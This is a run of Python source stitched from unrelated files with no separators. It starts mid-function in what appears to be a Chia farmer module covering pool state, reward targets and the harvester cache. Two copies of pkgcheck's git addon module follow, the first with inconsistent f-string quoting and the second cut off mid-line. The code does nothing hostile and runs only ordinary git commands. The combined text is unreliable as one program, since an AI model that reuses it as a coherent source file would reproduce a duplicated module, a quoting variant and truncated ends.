the pool if required if ( farmer_info is not None and pool_config.payout_instructions.lower() != farmer_info.payout_instructions.lower() ): owner_sk = await find_owner_sk(self.all_root_sks, pool_config.owner_public_key) put_farmer_response_dict = await self._pool_put_farmer( pool_config, authentication_token_timeout, owner_sk ) try: # put_farmer_response: PutFarmerResponse = PutFarmerResponse.from_json_dict( # put_farmer_response_dict # ) # if put_farmer_response.payout_instructions: # self.log.info( # f"Farmer information successfully updated on the pool {pool_config.pool_url}" # ) # TODO: Fix Streamable implementation and recover the above. if put_farmer_response_dict["payout_instructions"]: self.log.info( f"Farmer information successfully updated on the pool {pool_config.pool_url}" ) else: raise Exception except Exception: self.log.error( f"Failed to update farmer information on the pool {pool_config.pool_url}" ) else: self.log.warning( f"No pool specific authentication_token_timeout has been set for {p2_singleton_puzzle_hash}" f", check communication with the pool." ) except Exception as e: tb = traceback.format_exc() self.log.error(f"Exception in update_pool_state for {pool_config.pool_url}, {e} {tb}") def get_public_keys(self): return [child_sk.get_g1() for child_sk in self._private_keys] def get_private_keys(self): return self._private_keys async def get_reward_targets(self, search_for_private_key: bool) -> Dict: if search_for_private_key: all_sks = await self.get_all_private_keys() stop_searching_for_farmer, stop_searching_for_pool = False, False for i in range(500): if stop_searching_for_farmer and stop_searching_for_pool and i > 0: break for sk, _ in all_sks: ph = create_puzzlehash_for_pk(master_sk_to_wallet_sk(sk, uint32(i)).get_g1()) if ph == self.farmer_target: stop_searching_for_farmer = True if ph == self.pool_target: stop_searching_for_pool = True return { "farmer_target": self.farmer_target_encoded, "pool_target": self.pool_target_encoded, "have_farmer_sk": stop_searching_for_farmer, "have_pool_sk": stop_searching_for_pool, } return { "farmer_target": self.farmer_target_encoded, "pool_target": self.pool_target_encoded, } def set_reward_targets(self, farmer_target_encoded: Optional[str], pool_target_encoded: Optional[str]): config = load_config(self._root_path, "config.yaml") if farmer_target_encoded is not None: self.farmer_target_encoded = farmer_target_encoded self.farmer_target = decode_puzzle_hash(farmer_target_encoded) config["farmer"]["xch_target_address"] = farmer_target_encoded if pool_target_encoded is not None: self.pool_target_encoded = pool_target_encoded self.pool_target = decode_puzzle_hash(pool_target_encoded) config["pool"]["xch_target_address"] = pool_target_encoded save_config(self._root_path, "config.yaml", config) async def set_payout_instructions(self, launcher_id: bytes32, payout_instructions: str): for p2_singleton_puzzle_hash, pool_state_dict in self.pool_state.items(): if launcher_id == pool_state_dict["pool_config"].launcher_id: config = load_config(self._root_path, "config.yaml") new_list = [] for list_element in config["pool"]["pool_list"]: if hexstr_to_bytes(list_element["launcher_id"]) == bytes(launcher_id): list_element["payout_instructions"] = payout_instructions new_list.append(list_element) config["pool"]["pool_list"] = new_list save_config(self._root_path, "config.yaml", config) # Force a GET /farmer which triggers the PUT /farmer if it detects the changed instructions pool_state_dict["next_farmer_update"] = 0 return self.log.warning(f"Launcher id: {launcher_id} not found") async def generate_login_link(self, launcher_id: bytes32) -> Optional[str]: for pool_state in self.pool_state.values(): pool_config: PoolWalletConfig = pool_state["pool_config"] if pool_config.launcher_id == launcher_id: authentication_sk: Optional[PrivateKey] = await find_authentication_sk( self.all_root_sks, pool_config.authentication_public_key ) if authentication_sk is None: self.log.error(f"Could not find authentication sk for pk: {pool_config.authentication_public_key}") continue assert authentication_sk.get_g1() == pool_config.authentication_public_key authentication_token_timeout = pool_state["authentication_token_timeout"] authentication_token = get_current_authentication_token(authentication_token_timeout) message: bytes32 = std_hash( AuthenticationPayload( "get_login", pool_config.launcher_id, pool_config.target_puzzle_hash, authentication_token ) ) signature: G2Element = AugSchemeMPL.sign(authentication_sk, message) return ( pool_config.pool_url + f"/login?launcher_id={launcher_id.hex()}&authentication_token={authentication_token}" f"&signature={bytes(signature).hex()}" ) return None async def update_cached_harvesters(self) -> bool: # First remove outdated cache entries self.log.debug(f"update_cached_harvesters cache entries: {len(self.harvester_cache)}") remove_hosts = [] for host, host_cache in self.harvester_cache.items(): remove_peers = [] for peer_id, peer_cache in host_cache.items(): # If the peer cache is expired it means the harvester didn't respond for too long if peer_cache.expired(): remove_peers.append(peer_id) for key in remove_peers: del host_cache[key] if len(host_cache) == 0: self.log.debug(f"update_cached_harvesters remove host: {host}") remove_hosts.append(host) for key in remove_hosts: del self.harvester_cache[key] # Now query each harvester and update caches updated = False for connection in self.server.get_connections(NodeType.HARVESTER): cache_entry = await self.get_cached_harvesters(connection) if cache_entry.needs_update(): self.log.debug(f"update_cached_harvesters update harvester: {connection.peer_node_id}") cache_entry.bump_last_update() response = await connection.request_plots( harvester_protocol.RequestPlots(), timeout=UPDATE_HARVESTER_CACHE_INTERVAL ) if response is not None: if isinstance(response, harvester_protocol.RespondPlots): new_data: Dict = response.to_json_dict() if cache_entry.data != new_data: updated = True self.log.debug(f"update_cached_harvesters cache updated: {connection.peer_node_id}") else: self.log.debug(f"update_cached_harvesters no changes for: {connection.peer_node_id}") cache_entry.set_data(new_data) else: self.log.error( f"Invalid response from harvester:" f"peer_host {connection.peer_host}, peer_node_id {connection.peer_node_id}" ) else: self.log.error( "Harvester did not respond. You might need to update harvester to the latest version" ) return updated async def get_cached_harvesters(self, connection: WSChiaConnection) -> HarvesterCacheEntry: host_cache = self.harvester_cache.get(connection.peer_host) if host_cache is None: host_cache = {} self.harvester_cache[connection.peer_host] = host_cache node_cache = host_cache.get(connection.peer_node_id.hex()) if node_cache is None: node_cache = HarvesterCacheEntry() host_cache[connection.peer_node_id.hex()] = node_cache return node_cache async def get_harvesters(self) -> Dict: harvesters: List = [] for connection in self.server.get_connections(NodeType.HARVESTER): self.log.debug(f"get_harvesters host: {connection.peer_host}, node_id: {connection.peer_node_id}") cache_entry = await self.get_cached_harvesters(connection) if cache_entry.data is not None: harvester_object: dict = dict(cache_entry.data) harvester_object["connection"] = { "node_id": connection.peer_node_id.hex(), "host": connection.peer_host, "port": connection.peer_port, } harvesters.append(harvester_object) else: self.log.debug(f"get_harvesters no cache: {connection.peer_host}, node_id: {connection.peer_node_id}") return {"harvesters": harvesters} async def _periodically_update_pool_state_task(self): time_slept: uint64 = uint64(0) config_path: Path = config_path_for_filename(self._root_path, "config.yaml") while not self._shut_down: # Every time the config file changes, read it to check the pool state stat_info = config_path.stat() if stat_info.st_mtime > self.last_config_access_time: # If we detect the config file changed, refresh private keys first just in case self.all_root_sks: List[PrivateKey] = [sk for sk, _ in await self.get_all_private_keys()] self.last_config_access_time = stat_info.st_mtime await self.update_pool_state() time_slept = uint64(0) elif time_slept > 60: await self.update_pool_state() time_slept = uint64(0) time_slept += 1 await asyncio.sleep(1) async def _periodically_clear_cache_and_refresh_task(self): time_slept: uint64 = uint64(0) refresh_slept = 0 while not self._shut_down: try: if time_slept > self.constants.SUB_SLOT_TIME_TARGET: now = time.time() removed_keys: List[bytes32] = [] for key, add_time in self.cache_add_time.items(): if now - float(add_time) > self.constants.SUB_SLOT_TIME_TARGET * 3: self.sps.pop(key, None) self.proofs_of_space.pop(key, None) self.quality_str_to_identifiers.pop(key, None) self.number_of_responses.pop(key, None) removed_keys.append(key) for key in removed_keys: self.cache_add_time.pop(key, None) time_slept = uint64(0) log.debug( f"Cleared farmer cache. Num sps: {len(self.sps)} {len(self.proofs_of_space)} " f"{len(self.quality_str_to_identifiers)} {len(self.number_of_responses)}" ) time_slept += 1 refresh_slept += 1 # Periodically refresh GUI to show the correct download/upload rate. if refresh_slept >= 30: self.state_changed("add_connection", {}) refresh_slept = 0 # Handles harvester plots cache cleanup and updates if await self.update_cached_harvesters(): self.state_changed("new_plots", await self.get_harvesters()) except Exception: log.error(f"_periodically_clear_cache_and_refresh_task failed: {traceback.format_exc()}") await asyncio.sleep(1)
"""Git specific support and addon.""" import argparse import os import re import shlex import subprocess from collections import defaultdict, deque from dataclasses import dataclass from datetime import datetime from functools import partial from itertools import takewhile from pathspec import PathSpec from pkgcore.ebuild import cpv from pkgcore.ebuild.atom import MalformedAtom from pkgcore.ebuild.atom import atom as atom_cls from pkgcore.repository import multiplex from pkgcore.repository.util import SimpleTree from pkgcore.restrictions import packages from snakeoil.cli import arghparse from snakeoil.contexts import GitStash from snakeoil.klass import jit_attr from snakeoil.mappings import ImmutableDict, OrderedSet from snakeoil.osutils import pjoin from snakeoil.process import CommandNotFound, find_binary from snakeoil.strings import pluralism from .. import base from ..base import PkgcheckUserException from ..checks import GitCommitsCheck from ..log import logger from . import caches @dataclass(frozen=True, eq=False) class GitCommit: """Git commit objects.""" hash: str commit_time: int author: str committer: str message: tuple pkgs: ImmutableDict = ImmutableDict() def __str__(self): return self.hash def __hash__(self): return hash(self.hash) def __eq__(self, other): return self.hash == other.hash @dataclass(frozen=True) class GitPkgChange: """Git package change objects.""" atom: atom_cls status: str commit: str commit_time: int old: atom_cls = None class GitError(Exception): """Generic git-related error.""" class GitCache(caches.DictCache): """Dictionary-based cache that encapsulates git commit data.""" def __init__(self, *args, commit): super().__init__(*args) self.commit = commit class GitLog: """Iterator for decoded `git log` line output.""" def __init__(self, cmd, path): self._running = False self.proc = subprocess.Popen( cmd, cwd=path, stdout=subprocess.PIPE, stderr=subprocess.PIPE) def __iter__(self): return self def __next__(self): # use replacement character for non-UTF8 decoding issues (issue #166) line = self.proc.stdout.readline().decode('utf-8', 'replace') # verify git log is running as expected after pulling the first line if not self._running: if self.proc.poll() or not line: error = self.proc.stderr.read().decode().strip() raise GitError(f'failed running git log: {error}') self._running = True # EOF has been reached when readline() returns an empty string if not line: raise StopIteration return line.rstrip() class _ParseGitRepo: """Generic iterator for custom git log output parsing support.""" # git command to run on the targeted repo _git_cmd = 'git log --name-status --diff-filter=ARMD -z' # custom git log format lines, see the "PRETTY FORMATS" section of # the git log man page for details _format = () # path regexes for git log parsing, validation is handled on instantiation _ebuild_re = re.compile(r'^(?P<category>[^/]+)/[^/]+/(?P<package>[^/]+)\.ebuild$') def __init__(self, path, commit_range): self.path = os.path.realpath(path) cmd = shlex.split(self._git_cmd) cmd.append(f"--pretty=tformat:%n{"%n".join(self._format)}") cmd.append(commit_range) self.git_log = GitLog(cmd, self.path) # discard the initial newline next(self.git_log) def __iter__(self): return self def __next__(self): raise NotImplementedError(self.__next__) @property def changes(self): """Generator of file change status with changed packages.""" changes = deque(next(self.git_log).strip('\x00').split('\x00')) while changes: status = changes.popleft() if status.startswith('R'): # matched R status change status = 'R' old = changes.popleft() new = changes.popleft() if (mo := self._ebuild_re.match(old)) and (mn := self._ebuild_re.match(new)): try: old_pkg = atom_cls(f"={mo.group("category")}/{mo.group("package")}") new_pkg = atom_cls(f"={mn.group("category")}/{mn.group("package")}") yield status, [old_pkg, new_pkg] except MalformedAtom: continue else: # matched ADM status change path = changes.popleft() if mo := self._ebuild_re.match(path): try: pkg = atom_cls(f"={mo.group("category")}/{mo.group("package")}") yield status, [pkg] except MalformedAtom: continue class GitRepoCommits(_ParseGitRepo): """Parse git log output into an iterator of commit objects.""" _format = ( '%h', # abbreviated commit hash '%ct', # commit timestamp '%an <%ae>', # Author Name <author@email.com> '%cn <%ce>', # Committer Name <committer@email.com> '%B', # commit message ) def __next__(self): commit_hash = next(self.git_log) commit_time = int(next(self.git_log)) author = next(self.git_log) committer = next(self.git_log) message = list(takewhile(lambda x: x != '\x00', self.git_log)) pkgs = defaultdict(set) for status, atoms in self.changes: if status == 'R': old, new = atoms pkgs['A'].add(new) pkgs['D'].add(old) else: pkgs[status].update(atoms) return GitCommit(commit_hash, commit_time, author, committer, message, ImmutableDict(pkgs)) class GitRepoPkgs(_ParseGitRepo): """Parse git log output into an iterator of package change objects.""" _format = ( '%h', # abbreviated commit hash '%ct', # commit time ) def __init__(self, *args, local=False): super().__init__(*args) self.local = local self._pkgs = deque() def __next__(self): while True: try: return self._pkgs.popleft() except IndexError: commit_hash = next(self.git_log) commit_time = int(next(self.git_log).rstrip('\x00')) self._pkg_changes(commit_hash, commit_time) def _pkg_changes(self, commit_hash, commit_time): """Queue package change objects from git log file changes.""" for status, pkgs in self.changes: if status == 'R': old, new = pkgs if not self.local: # treat rename as addition and removal self._pkgs.append( GitPkgChange(new, 'A', commit_hash, commit_time)) self._pkgs.append( GitPkgChange(old, 'D', commit_hash, commit_time)) else: # renames are split into add/remove ops at # the check level for the local commits repo self._pkgs.append(GitPkgChange( new, 'R', commit_hash, commit_time, old)) else: self._pkgs.append(GitPkgChange(pkgs[0], status, commit_hash, commit_time)) class _GitCommitPkg(cpv.VersionedCPV): """Fake packages encapsulating commits parsed from git log.""" def __init__(self, category, package, status, version, time, commit, old=None): super().__init__(category, package, version) # add additional attrs sf = object.__setattr__ sf(self, 'time', time) sf(self, 'status', status) sf(self, 'commit', commit) sf(self, 'old', old) def old_pkg(self): """Create a new object from a rename commit's old atom.""" return self.__class__( self.old.category, self.old.package, self.status, self.old.version, self.time, self.commit) class GitChangedRepo(SimpleTree): """Historical git repo consisting of the latest changed packages.""" # selected pkg status filter _status_filter = {'A', 'R', 'M', 'D'} def __init__(self, *args, **kwargs): kwargs.setdefault('pkg_klass', _GitCommitPkg) super().__init__(*args, **kwargs) def _get_versions(self, cp): versions = [] for status, data in self.cpv_dict[cp[0]][cp[1]].items(): if status in self._status_filter: for commit in data: versions.append((status, commit)) return versions def _internal_gen_candidates(self, candidates, sorter, raw_pkg_cls, **kwargs): for cp in sorter(candidates): yield from sorter( raw_pkg_cls(cp[0], cp[1], status, *commit) for status, commit in self.versions.get(cp, ())) class GitModifiedRepo(GitChangedRepo): """Historical git repo consisting of the latest modified packages.""" _status_filter = {'A', 'M'} class GitAddedRepo(GitChangedRepo): """Historical git repo consisting of added packages.""" _status_filter = {'A'} class GitRemovedRepo(GitChangedRepo): """Historical git repo consisting of removed packages.""" _status_filter = {'D'} class _ScanGit(argparse.Action): """Argparse action that enables scanning against git commits or staged changes.""" def __init__(self, *args, staged=False, **kwargs): super().__init__(*args, **kwargs) if staged: default_ref = 'HEAD' diff_cmd = ['git', 'diff-index', '--name-only', '--cached', '-z'] else: default_ref = 'origin..HEAD' diff_cmd = ['git', 'diff-tree', '-r', '--name-only', '-z'] self.staged = staged self.default_ref = default_ref self.diff_cmd = diff_cmd def generate_restrictions(self, parser, namespace, ref): """Generate restrictions for a given diff command.""" try: p = subprocess.run( self.diff_cmd + [ref], stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=namespace.target_repo.location, check=True, encoding='utf8') except FileNotFoundError as e: parser.error(str(e)) except subprocess.CalledProcessError as e: error = e.stderr.splitlines()[0] parser.error(f'failed running git: {error}') if not p.stdout: # no changes exist, exit early parser.exit() eclass_re = re.compile(r'^eclass/(?P<eclass>\S+)\.eclass$') eclasses, profiles, pkgs = OrderedSet(), OrderedSet(), OrderedSet() for path in p.stdout.strip('\x00').split('\x00'): path_components = path.split(os.sep) if mo := eclass_re.match(path): eclasses.add(mo.group('eclass')) elif path_components[0] == 'profiles': profiles.add(path) elif path_components[0] in namespace.target_repo.categories: try: pkgs.add(atom_cls(os.sep.join(path_components[:2]))) except MalformedAtom: continue restrictions = [] if pkgs: restrict = packages.OrRestriction(*pkgs) restrictions.append((base.package_scope, restrict)) if eclasses: restrictions.append((base.eclass_scope, eclasses)) if profiles: restrictions.append((base.profile_node_scope, profiles)) # no relevant targets, exit early if not restrictions: parser.exit() return restrictions def __call__(self, parser, namespace, value, option_string=None): if namespace.targets: targets = ' '.join(namespace.targets) s = pluralism(namespace.targets) parser.error(f'{option_string} is mutually exclusive with target{s}: {targets}') if not self.staged: # avoid circular import issues from .. import objects # enable git checks namespace.enabled_checks.update(objects.CHECKS.select(GitCommitsCheck).values()) # determine target ref ref = value if value is not None else self.default_ref setattr(namespace, self.dest, ref) # generate scanning restrictions namespace.restrictions = self.generate_restrictions(parser, namespace, ref) # ignore irrelevant changes during scan namespace.contexts.append(GitStash(namespace.target_repo.location, staged=self.staged)) class GitAddon(caches.CachedAddon): """Git repo support for various checks. Pkgcheck can create virtual package repos from a given git repo's history in order to provide more info for checks relating to stable requests, outdated blockers, or local commits. These virtual repos are cached and updated every run if new commits are detected. Git repos must have a supported config in order to work properly. Specifically, pkgcheck assumes that the origin branch exists and tracks upstream. Additionally, the origin/HEAD ref must exist. If it doesn't, running ``git remote set-head origin master`` or similar for other branches will create it. """ # cache registry cache = caches.CacheData(type='git', file='git.pickle', version=5) @classmethod def mangle_argparser(cls, parser): group = parser.add_argument_group('git', docs=cls.__doc__) git_opts = group.add_mutually_exclusive_group() git_opts.add_argument( '--commits', nargs='?', default=False, metavar='tree-ish', action=arghparse.Delayed, target=_ScanGit, priority=10, help='determine scan targets from unpushed commits', docs=""" Targets are determined from the committed changes compared to a given reference that defaults to the repo's origin. For example, to scan all the packages that have been changed in the current branch compared to the branch named 'old' use ``pkgcheck scan --commits old``. For two separate branches named 'old' and 'new' use ``pkgcheck scan --commits old..new``. """) git_opts.add_argument( '--staged', nargs='?', default=False, metavar='tree-ish', action=arghparse.Delayed, target=partial(_ScanGit, staged=True), priority=10, help='determine scan targets from staged changes', docs=""" Targets are determined using all staged changes for the git repo. Unstaged changes and untracked files are ignored by temporarily stashing them during the scanning process. """) def __init__(self, *args): super().__init__(*args) try: find_binary('git') except CommandNotFound: raise caches.CacheDisabled(self.cache) # mapping of repo locations to their corresponding git repo caches self._cached_repos = {} @jit_attr def _gitignore(self): """Load a repo's .gitignore and .git/info/exclude files for path matching.""" patterns = [] for path in ('.gitignore', '.git/info/exclude'): try: with open(pjoin(self.options.target_repo.location, path)) as f: patterns.extend(f) except (FileNotFoundError, IOError): pass if patterns: return PathSpec.from_lines('gitwildmatch', patterns) return None def gitignored(self, path): """Determine if a given path in a repository is matched by .gitignore settings.""" if self._gitignore is not None: if path.startswith(self.options.target_repo.location): repo_prefix_len = len(self.options.target_repo.location) + 1 path = path[repo_prefix_len:] return self._gitignore.match_file(path) return False @staticmethod def _get_commit_hash(path, commit='origin/HEAD'): """Retrieve a git repo's commit hash for a specific commit object.""" try: p = subprocess.run( ['git', 'rev-parse', commit], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, cwd=path, check=True, encoding='utf8') except subprocess.CalledProcessError: raise GitError(f'failed retrieving commit hash for git repo: {path!r}') return p.stdout.strip() @staticmethod def pkg_history(repo, commit_range, data=None, local=False, verbosity=-1): """Create or update historical package data for a given commit range.""" if data is None: data = {} seen = set() with base.ProgressManager(verbosity=verbosity) as progress: for pkg in GitRepoPkgs(repo.location, commit_range, local=local): atom = pkg.atom key = (atom, pkg.status) if key not in seen: seen.add(key) if local: commit = (atom.fullver, pkg.commit_time, pkg.commit, pkg.old) else: date = datetime.fromtimestamp(pkg.commit_time).strftime('%Y-%m-%d') progress(f'{repo} -- updating git cache: commit date: {date}') commit = (atom.fullver, pkg.commit_time, pkg.commit) data.setdefault(atom.category, {}).setdefault( atom.package, {}).setdefault(pkg.status, []).append(commit) return data def update_cache(self, force=False): """Update related cache and push updates to disk.""" for repo in self.options.target_repo.trees: try: commit = self._get_commit_hash(repo.location) except GitError: continue # initialize cache file location cache_file = self.cache_file(repo) git_cache = None cache_repo = True if not force: git_cache = self.load_cache(cache_file) if git_cache is None or commit != git_cache.commit: logger.debug('updating %s git repo cache to %s', repo, commit[:13]) if git_cache is None: data = {} commit_range = 'origin/HEAD' else: data = git_cache.data commit_range = f'{git_cache.commit}..origin/HEAD' try: self.pkg_history( repo, commit_range, data=data, verbosity=self.options.verbosity) except GitError as e: raise PkgcheckUserException(str(e)) git_cache = GitCache(data, self.cache, commit=commit) else: cache_repo = False if git_cache: self._cached_repos[repo.location] = git_cache # push repo to disk if it was created or updated if cache_repo: self.save_cache(git_cache, cache_file) def cached_repo(self, repo_cls): git_repos = [] for repo in self.options.target_repo.trees: git_cache = self._cached_repos.get(repo.location, {}) git_repos.append(repo_cls(git_cache, repo_id=f'{repo.repo_id}-history')) if len(git_repos) > 1: return multiplex.tree(*git_repos) return git_repos[0] def commits_repo(self, repo_cls): target_repo = self.options.target_repo data = {} try: origin = self._get_commit_hash(target_repo.location) head = self._get_commit_hash(target_repo.location, commit='HEAD') if origin != head: data = self.pkg_history(target_repo, 'origin/HEAD..HEAD', local=True) except GitError as e: raise PkgcheckUserException(str(e)) repo_id = f'{target_repo.repo_id}-commits' return repo_cls(data, repo_id=repo_id) def commits(self): target_repo = self.options.target_repo commits = () try: origin = self._get_commit_hash(target_repo.location) head = self._get_commit_hash(target_repo.location, commit='HEAD') if origin != head: commits = GitRepoCommits(target_repo.location, 'origin/HEAD..HEAD') except GitError as e: raise PkgcheckUserException(str(e)) return iter(commits)
"""Git specific support and addon.""" import argparse import os import re import shlex import subprocess from collections import defaultdict, deque from dataclasses import dataclass from datetime import datetime from functools import partial from itertools import takewhile from pathspec import PathSpec from pkgcore.ebuild import cpv from pkgcore.ebuild.atom import MalformedAtom from pkgcore.ebuild.atom import atom as atom_cls from pkgcore.repository import multiplex from pkgcore.repository.util import SimpleTree from pkgcore.restrictions import packages from snakeoil.cli import arghparse from snakeoil.contexts import GitStash from snakeoil.klass import jit_attr from snakeoil.mappings import ImmutableDict, OrderedSet from snakeoil.osutils import pjoin from snakeoil.process import CommandNotFound, find_binary from snakeoil.strings import pluralism from .. import base from ..base import PkgcheckUserException from ..checks import GitCommitsCheck from ..log import logger from . import caches @dataclass(frozen=True, eq=False) class GitCommit: """Git commit objects.""" hash: str commit_time: int author: str committer: str message: tuple pkgs: ImmutableDict = ImmutableDict() def __str__(self): return self.hash def __hash__(self): return hash(self.hash) def __eq__(self, other): return self.hash == other.hash @dataclass(frozen=True) class GitPkgChange: """Git package change objects.""" atom: atom_cls status: str commit: str commit_time: int old: atom_cls = None class GitError(Exception): """Generic git-related error.""" class GitCache(caches.DictCache): """Dictionary-based cache that encapsulates git commit data.""" def __init__(self, *args, commit): super().__init__(*args) self.commit = commit class GitLog: """Iterator for decoded `git log` line output.""" def __init__(self, cmd, path): self._running = False self.proc = subprocess.Popen( cmd, cwd=path, stdout=subprocess.PIPE, stderr=subprocess.PIPE) def __iter__(self): return self def __next__(self): # use replacement character for non-UTF8 decoding issues (issue #166) line = self.proc.stdout.readline().decode('utf-8', 'replace') # verify git log is running as expected after pulling the first line if not self._running: if self.proc.poll() or not line: error = self.proc.stderr.read().decode().strip() raise GitError(f'failed running git log: {error}') self._running = True # EOF has been reached when readline() returns an empty string if not line: raise StopIteration return line.rstrip() class _ParseGitRepo: """Generic iterator for custom git log output parsing support.""" # git command to run on the targeted repo _git_cmd = 'git log --name-status --diff-filter=ARMD -z' # custom git log format lines, see the "PRETTY FORMATS" section of # the git log man page for details _format = () # path regexes for git log parsing, validation is handled on instantiation _ebuild_re = re.compile(r'^(?P<category>[^/]+)/[^/]+/(?P<package>[^/]+)\.ebuild$') def __init__(self, path, commit_range): self.path = os.path.realpath(path) cmd = shlex.split(self._git_cmd) cmd.append(f"--pretty=tformat:%n{'%n'.join(self._format)}") cmd.append(commit_range) self.git_log = GitLog(cmd, self.path) # discard the initial newline next(self.git_log) def __iter__(self): return self def __next__(self): raise NotImplementedError(self.__next__) @property def changes(self): """Generator of file change status with changed packages.""" changes = deque(next(self.git_log).strip('\x00').split('\x00')) while changes: status = changes.popleft() if status.startswith('R'): # matched R status change status = 'R' old = changes.popleft() new = changes.popleft() if (mo := self._ebuild_re.match(old)) and (mn := self._ebuild_re.match(new)): try: old_pkg = atom_cls(f"={mo.group('category')}/{mo.group('package')}") new_pkg = atom_cls(f"={mn.group('category')}/{mn.group('package')}") yield status, [old_pkg, new_pkg] except MalformedAtom: continue else: # matched ADM status change path = changes.popleft() if mo := self._ebuild_re.match(path): try: pkg = atom_cls(f"={mo.group('category')}/{mo.group('package')}") yield status, [pkg] except MalformedAtom: continue class GitRepoCommits(_ParseGitRepo): """Parse git log output into an iterator of commit objects.""" _format = ( '%h', # abbreviated commit hash '%ct', # commit timestamp '%an <%ae>', # Author Name <author@email.com> '%cn <%ce>', # Committer Name <committer@email.com> '%B', # commit message ) def __next__(self): commit_hash = next(self.git_log) commit_time = int(next(self.git_log)) author = next(self.git_log) committer = next(self.git_log) message = list(takewhile(lambda x: x != '\x00', self.git_log)) pkgs = defaultdict(set) for status, atoms in self.changes: if status == 'R': old, new = atoms pkgs['A'].add(new) pkgs['D'].add(old) else: pkgs[status].update(atoms) return GitCommit(commit_hash, commit_time, author, committer, message, ImmutableDict(pkgs)) class GitRepoPkgs(_ParseGitRepo): """Parse git log output into an iterator of package change objects.""" _format = ( '%h', # abbreviated commit hash '%ct', # commit time ) def __init__(self, *args, local=False): super().__init__(*args) self.local = local self._pkgs = deque() def __next__(self): while True: try: return self._pkgs.popleft() except IndexError: commit_hash = next(self.git_log) commit_time = int(next(self.git_log).rstrip('\x00')) self._pkg_changes(commit_hash, commit_time) def _pkg_changes(self, commit_hash, commit_time): """Queue package change objects from git log file changes.""" for status, pkgs in self.changes: if status == 'R': old, new = pkgs if not self.local: # treat rename as addition and removal self._pkgs.append( GitPkgChange(new, 'A', commit_hash, commit_time)) self._pkgs.append( GitPkgChange(old, 'D', commit_hash, commit_time)) else: # renames are split into add/remove ops at # the check level for the local commits repo self._pkgs.append(GitPkgChange( new, 'R', commit_hash, commit_time, old)) else: self._pkgs.append(GitPkgChange(pkgs[0], status, commit_hash, commit_time)) class _GitCommitPkg(cpv.VersionedCPV): """Fake packages encapsulating commits parsed from git log.""" def __init__(self, category, package, status, version, time, commit, old=None): super().__init__(category, package, version) # add additional attrs sf = object.__setattr__ sf(self, 'time', time) sf(self, 'status', status) sf(self, 'commit', commit) sf(self, 'old', old) def old_pkg(self): """Create a new object from a rename commit's old atom.""" return self.__class__( self.old.category, self.old.package, self.status, self.old.version, self.time, self.commit) class GitChangedRepo(SimpleTree): """Historical git repo consisting of the latest changed packages.""" # selected pkg status filter _status_filter = {'A', 'R', 'M', 'D'} def __init__(self, *args, **kwargs): kwargs.setdefault('pkg_klass', _GitCommitPkg) super().__init__(*args, **kwargs) def _get_versions(self, cp): versions = [] for status, data in self.cpv_dict[cp[0]][cp[1]].items(): if status in self._status_filter: for commit in data: versions.append((status, commit)) return versions def _internal_gen_candidates(self, candidates, sorter, raw_pkg_cls, **kwargs): for cp in sorter(candidates): yield from sorter( raw_pkg_cls(cp[0], cp[1], status, *commit) for status, commit in self.versions.get(cp, ())) class GitModifiedRepo(GitChangedRepo): """Historical git repo consisting of the latest modified packages.""" _status_filter = {'A', 'M'} class GitAddedRepo(GitChangedRepo): """Historical git repo consisting of added packages.""" _status_filter = {'A'} class GitRemovedRepo(GitChangedRepo): """Historical git repo consisting of removed packages.""" _status_filter = {'D'} class _ScanGit(argparse.Action): """Argparse action that enables scanning against git commits or staged changes.""" def __init__(self, *args, staged=False, **kwargs): super().__init__(*args, **kwargs) if staged: default_ref = 'HEAD' diff_cmd = ['git', 'diff-index', '--name-only', '--cached', '-z'] else: default_ref = 'origin..HEAD' diff_cmd = ['git', 'diff-tree', '-r', '--name-only', '-z'] self.staged = staged self.default_ref = default_ref self.diff_cmd = diff_cmd def generate_restrictions(self, parser, namespace, ref): """Generate restrictions for a given diff command.""" try: p = subprocess.run( self.diff_cmd + [ref], stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=namespace.target_repo.location, check=True, encoding='utf8') except FileNotFoundError as e: parser.error(str(e)) except subprocess.CalledProcessError as e: error = e.stderr.splitlines()[0] parser.error(f'failed running git: {error}') if not p.stdout: # no changes exist, exit early parser.exit() eclass_re = re.compile(r'^eclass/(?P<eclass>\S+)\.eclass$') eclasses, profiles, pkgs = OrderedSet(), OrderedSet(), OrderedSet() for path in p.stdout.strip('\x00').split('\x00'): path_components = path.split(os.sep) if mo := eclass_re.match(path): eclasses.add(mo.group('eclass')) elif path_components[0] == 'profiles': profiles.add(path) elif path_components[0] in namespace.target_repo.categories: try: pkgs.add(atom_cls(os.sep.join(path_components[:2]))) except MalformedAtom: continue restrictions = [] if pkgs: restrict = packages.OrRestriction(*pkgs) restrictions.append((base.package_scope, restrict)) if eclasses: restrictions.append((base.eclass_scope, eclasses)) if profiles: restrictions.append((base.profile_node_scope, profiles)) # no relevant targets, exit early if not restrictions: parser.exit() return restrictions def __call__(self, parser, namespace, value, option_string=None): if namespace.targets: targets = ' '.join(namespace.targets) s = pluralism(namespace.targets) parser.error(f'{option_string} is mutually exclusive with target{s}: {targets}') if not self.staged: # avoid circular import issues from .. import objects # enable git checks namespace.enabled_checks.update(objects.CHECKS.select(GitCommitsCheck).values()) # determine target ref ref = value if value is not None else self.default_ref setattr(namespace, self.dest, ref) # generate scanning restrictions namespace.restrictions = self.generate_restrictions(parser, namespace, ref) # ignore irrelevant changes during scan namespace.contexts.append(GitStash(namespace.target_repo.location, staged=self.staged)) class GitAddon(caches.CachedAddon): """Git repo support for various checks. Pkgcheck can create virtual package repos from a given git repo's history in order to provide more info for checks relating to stable requests, outdated blockers, or local commits. These virtual repos are cached and updated every run if new commits are detected. Git repos must have a supported config in order to work properly. Specifically, pkgcheck assumes that the origin branch exists and tracks upstream. Additionally, the origin/HEAD ref must exist. If it doesn't, running ``git remote set-head origin master`` or similar for other branches will create it. """ # cache registry cache = caches.CacheData(type='git', file='git.pickle', version=5) @classmethod def mangle_argparser(cls, parser): group = parser.add_argument_group('git', docs=cls.__doc__) git_opts = group.add_mutually_exclusive_group() git_opts.add_argument( '--commits', nargs='?', default=False, metavar='tree-ish', action=arghparse.Delayed, target=_ScanGit, priority=10, help='determine scan targets from unpushed commits', docs=""" Targets are determined from the committed changes compared to a given reference that defaults to the repo's origin. For example, to scan all the packages that have been changed in the current branch compared to the branch named 'old' use ``pkgcheck scan --commits old``. For two separate branches named 'old' and 'new' use ``pkgcheck scan --commits old..new``. """) git_opts.add_argument( '--staged', nargs='?', default=False, metavar='tree-ish', action=arghparse.Delayed, target=partial(_ScanGit, staged=True), priority=10, help='determine scan 